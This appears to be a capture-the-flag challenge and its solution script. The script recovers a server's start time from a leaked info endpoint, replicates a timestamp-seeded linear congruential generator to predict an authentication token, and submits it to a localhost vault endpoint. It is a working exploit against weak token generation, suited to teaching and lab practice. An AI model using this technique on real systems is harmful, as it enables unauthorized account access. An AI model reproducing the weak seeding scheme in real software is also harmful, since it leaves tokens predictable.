TokenForge generates authentication tokens using a Linear Congruential Generator seeded with the Unix timestamp. The server start time is leaked. Predict the PRNG to recover the token.
import requests, time
# Get server start time
r = requests.get('http://localhost:3000/api/info')
info = r.json()
seed = int(time.mktime(time.strptime(info['started'][:19], '%Y-%m-%dT%H:%M:%S')))
# Replicate the LCG
class LCG:
def __init__(self, seed):
self.state = seed & 0xFFFFFFFF
def next(self):
self.state = (1664525 * self.state + 1013904223) % (2**32)
return self.state
def nextInt(self, m):
return self.next() % m
charset = '0123456789abcdef'
prng = LCG(seed)
token = ''.join(charset[prng.nextInt(16)] for _ in range(16))
print(f"Predicted token: {token}")
r = requests.post('http://localhost:3000/api/vault/access', json={"token": token})
print(r.json())